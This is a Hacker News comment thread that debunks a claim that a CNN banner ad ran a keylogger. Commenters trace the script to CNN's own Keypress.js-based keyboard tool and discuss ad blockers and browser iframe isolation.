Lots of speculation here, not much analysis, even from lazy gits like me.<p>Chrome web inspector kindly gives the "Initiator" for every request. In this case it's cnn-header-second.min.js. Load that, and Chrome again kindly detects minified JS and offers to pretty-print it.<p>The context here appears to be some kind of ad console tool, added by CNN, not by an ad. The relevant function is at <a href="https://pastebin.com/EwgPAM6T" rel="nofollow">https://pastebin.com/EwgPAM6T</a><p>It's a bit obfuscated/minified, and they don't seem to have a non-minified version available, so it's not clear exactly what functionality this is enabling.<p>Either way, not really a keylogger if it's not capturing all keystrokes and shipping them off somewhere.
This is a prime example of how people so easily accept a headline shared on some news authority to be truth. Even the bright minds at hacker news are duped - just look at all the discussion happening here with the assumption the headline is correct.<p>The guy who tweeted this jumped to a conclusion, naively shared his discovery, then let it perpetuate leaving numerous victims of an erroneously altered world-view.
The point stands, but that's not really a keylogger. It's a library to manage keyboard inputs. Of course, it could also send all key info somewhere externally too.
I'm skeptical that this is a) from a banner ad and not from operation of the site b) a full blown keylogger and not a library included that is used for something like a photo gallery (that may have ads in it)
It appears to be getting the keypress.js library from ssl.cdn.turner.com. Not clear if the data is being exfiltrated, though, just by looking at that tweet.
>ssl.cdn.turner.com<p>Obviously bullshit. That's CNNs CDN, not a "banner ad". This guy did not put in the least bit of effort to verify his claims.<p>The script is included in <a href="https://edition.cnn.com/.a/2.103.4/js/cnn-header-second.min.js" rel="nofollow">https://edition.cnn.com/.a/2.103.4/js/cnn-header-second.min....</a>
Here's what is actually being run<p><a href="http://dmauro.github.io/Keypress/" rel="nofollow">http://dmauro.github.io/Keypress/</a>
I would suggest their "lite" [1] version. It is compatible with addons like NoScript, uMatrix, uBlock, Canvas Fingerprint Defender, CSS Exfil Protection, Privacy Settings and Self Destructing Cookies. I am using FF 52 ESR. Some of these addons may not work in 58+.<p>They could improve their HTTP header settings a bit. [2]<p>[1] - <a href="https://lite.cnn.io/" rel="nofollow">https://lite.cnn.io/</a><p>[2] - <a href="https://securityheaders.com/?q=https%3A%2F%2Fcnn.com%2F&followRedirects=on" rel="nofollow">https://securityheaders.com/?q=https%3A%2F%2Fcnn.com%2F&foll...</a>
Iframed banner ads <i>can’t</i> log keystrokes outside their frame, browsers don’t allow that. And no site in their right mind would include ads that aren’t iframed.<p>A keylogger would be possible if there was some kind of zero day exploit, but this isn’t that, it sound like the tweeter didn’t do their due diligence. I’m curious how someone gets as far as looking through the minified JavaScript without knowing the browser doesn’t allow that, obviously(?), otherwise all your passwords and information would have been compromised long ago.
as someone who claims they are a programmer and researcher... you would think they would have done some more research on this and also have common sense to know that this isn't a keylogger.
CNN, like the vast majority of news sites, is best viewed with javascript disabled. Pages load 10X faster, scrolling is not jumpy, the CPU doesn't go crazy, and text reads just as well. It is hands down a much improved user experience.
It's not CNN. It's ads.<p>Advertising has ruined every medium it has ever touched. It will ruin the web. It is only a matter of time. It did not destroy ancient network television overnight. It did not destroy cable tv overnight.<p>The last time I saw cable tv a few years back, it had become so bad that after a long run of ads, they would then put bugs and walk on people right over the content of the show you were watching. Sometimes obscuring important content within that show.
press shift-control-z on cnn.com and you will get what this supposed keylogger is (hint - its not a keylogger or comgin from an ad) but merely a cnn internal tool..
Dearest Ad Industry,<p>This is why we run ad blockers. Since you won't regulate your industry, we're fixing the problem for you.<p>Love,<p>The Rest of the World.